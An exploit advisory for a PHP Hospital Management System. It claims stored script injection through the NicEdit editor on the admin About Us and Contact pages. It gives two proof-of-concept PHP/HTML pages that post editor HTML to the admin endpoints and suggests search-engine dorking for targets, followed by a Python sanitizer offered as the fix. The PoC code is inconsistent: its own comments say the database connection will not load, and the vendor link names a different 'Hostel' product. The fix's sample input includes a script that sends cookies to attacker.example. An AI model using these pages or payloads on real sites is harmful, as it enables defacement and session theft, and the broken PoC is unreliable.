=============================================================================================================================================
| # Title : Hospital Management System 1.0 (WYSIWYG) Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Pro (Fr) / browser : Mozilla Firefox 129.0.1 (64-bit) |
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engines.
[+] Part 01 : about-us.php
[+] This payload injects content of your choice into the database through NicEdit (WYSIWYG editor v0.9 r25), which is loaded by /hms/admin/about-us.php. The editor's HTML is submitted as the pagedes field and written to tblpage.PageDescription with SQL escaping only, no HTML filtering.
[+] Line 2 : Make sure to include your database connection here
[+] Line 44 : fetch() call that sends the form data (set your target URL)
[+] Save the payload as poc.php under your local web root.
[+] payload :
<?php
// Make sure to include your database connection here. Note: include() over http:// needs allow_url_include=On and returns the server's rendered output of config.php, not its PHP source, so $con is only defined if this points at a local copy of config.php.
include('http://127.0.0.1/hospital/hms/admin/include/config.php');
if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
// Only SQL-escaped: the HTML that NicEdit produced is stored as-is, with no HTML filtering.
$pagedes = $con->real_escape_string($_POST['pagedes']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");
if ($query) {
echo '<script>alert("About Us has been updated.")</script>';
} else {
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);
// Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); // Prevent default form submission
const pagetitle = document.getElementById('pagetitle').value;
const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content
// Prepare the form data to be sent
const formData = new FormData();
formData.append('pagetitle', pagetitle);
formData.append('pagedes', pagedes);
formData.append('submit', true);
// Send the form data using fetch API
fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {
method: 'POST',
body: formData,
})
.then(response => response.text())
.then(data => {
alert('About Us content has been updated successfully.');
console.log(data); // Handle the response from the server
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
<style>
/* Center the form container */
.editor-container {
max-width: 800px;
margin: 0 auto; /* Center horizontally */
padding: 20px;
text-align: center; /* Center the content inside */
}
/* Ensure the textarea takes the full width */
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>
</div>
</section>
<!-- Form Section -->
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<!-- Centering the form using a wrapper div -->
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<!-- NicEdit will enhance this textarea -->
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
<!-- End Form Section -->
</div>
</div>
</div>
</div>
<!-- Footer -->
</body>
</html>
---------------------- [+] Part 02 : contact.php [+] --------------------
[+] Line 4 : Make sure to include your database connection here
[+] Line 60 : fetch() call that sends the form data (set your target URL)
[+] Save the payload as poc.php under your local web root.
[+] payload :
<?php
// Address of the remote server (the target's config.php)
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';
// Fetch the data from the remote server
$response = file_get_contents($url);
// Check that data was returned
if ($response !== FALSE) {
// Handle the data. Note: this is the HTTP response of config.php (normally empty), not its PHP source, so it does not define $con; include a local copy of config.php for the database connection used below.
echo $response;
} else {
echo 'An error occurred while fetching the data.';
}
if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
$pagedes = $con->real_escape_string($_POST['pagedes']);
$email = $con->real_escape_string($_POST['email']);
$mobnum = $con->real_escape_string($_POST['mobnum']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");
if ($query) {
echo '<script>alert("Contact Us has been updated.")</script>';
} else {
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Admin | Update Contact Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
bkLib.onDomLoaded(nicEditors.allTextAreas);
function submitForm(event) {
event.preventDefault();
const pagetitle = document.getElementById('pagetitle').value;
const pagedes = nicEditors.findEditor('pagedes').getContent();
const email = document.getElementById('email').value;
const mobnum = document.getElementById('mobnum').value;
const formData = new FormData();
formData.append('pagetitle', pagetitle);
formData.append('pagedes', pagedes);
formData.append('email', email);
formData.append('mobnum', mobnum);
formData.append('submit', true);
fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {
method: 'POST',
body: formData,
})
.then(response => response.text())
.then(data => {
alert('Contact Us content has been updated successfully.');
console.log(data);
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
<style>
.editor-container {
max-width: 800px;
margin: 0 auto;
padding: 20px;
text-align: center;
}
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Admin | Update Contact Us Content</h1>
</div>
<ol class="breadcrumb">
<li class="active">
<span>Update Contact Us Content</span>
</li>
</ol>
</div>
</section>
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<div class="form-group">
<label for="email">Email</label>
<input id="email" name="email" type="email" class="form-control" required>
</div>
<div class="form-group">
<label for="mobnum">Mobile Number</label>
<input id="mobnum" name="mobnum" type="text" class="form-control" required>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
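[+] Server-side fix (added example, not code from this advisory or from the Hospital Management System project): both handlers above write the NicEdit HTML to tblpage.PageDescription after SQL escaping only, so anything the editor submits, including script tags and event-handler attributes, reaches the database unfiltered. The allow-list sanitizer below is the check about-us.php and contact.php would need to run on pagedes before the UPDATE. It is written in Python so it runs stand-alone; the function names, the tag/attribute allow-lists and SAMPLE_PAGEDES are constructed for this example and are not taken from the project.

```python
"""Allow-list sanitizer for WYSIWYG (NicEdit-style) HTML before it is stored.

Added example, not code from the advisory or from the Hospital Management
System project. Function names, the allow-lists and SAMPLE_PAGEDES are
constructed for this example.
"""
from html import escape
from html.parser import HTMLParser

# Markup a "page description" legitimately needs; everything else is dropped.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "ul", "ol", "li",
                "h1", "h2", "h3", "blockquote", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style=, no on*= anywhere
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}  # tag and its body both go
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/", "#")

# Constructed sample of what nicEditors.findEditor('pagedes').getContent()
# could hand to the PoC: legitimate markup plus three injection attempts.
SAMPLE_PAGEDES = (
    '<p>Welcome to our <b>hospital</b>.</p>'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src=x onerror="alert(1)">'
    '<a href="javascript:alert(2)">contact</a>'
    '<a href="https://example.org/contact">contact</a>'
)


class WysiwygSanitizer(HTMLParser):
    """Rebuilds the document from allowed tags only, re-escaping all text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script> / <style>
        self.open_tags = []   # allowed tags emitted so far, for balanced output

    def _safe_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops onerror=, onclick=, style=, ...
            value = (value or "").strip()
            # Only known-safe href prefixes: blocks javascript:, data:,
            # vbscript: and scheme-obfuscation tricks in one check.
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # tag dropped, its text content still flows through
        self.out.append(f"<{tag}{self._safe_attrs(tag, attrs)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> and friends

    def handle_endtag(self, tag):
        tag = tag.lower()
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            while self.open_tags:  # close anything left open inside it
                opened = self.open_tags.pop()
                self.out.append(f"</{opened}>")
                if opened == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.open_tags:  # balance tags the editor left unterminated
            self.out.append(f"</{self.open_tags.pop()}>")


def sanitize_wysiwyg_html(html):
    """The check both handlers skip: call this on pagedes before the UPDATE."""
    sanitizer = WysiwygSanitizer()
    sanitizer.feed(html)
    sanitizer.close()
    return "".join(sanitizer.out)


if __name__ == "__main__":
    print("stored by the PoC handler :", SAMPLE_PAGEDES)
    print("stored after sanitizing   :", sanitize_wysiwyg_html(SAMPLE_PAGEDES))
```

Run it and the script block, the img with its onerror handler and the javascript: href are gone while the legitimate paragraph and the https link survive. An allow-list is used rather than a block-list because the editor emits a small, known set of tags; anything new is rejected by default instead of waiting for the next bypass.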
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================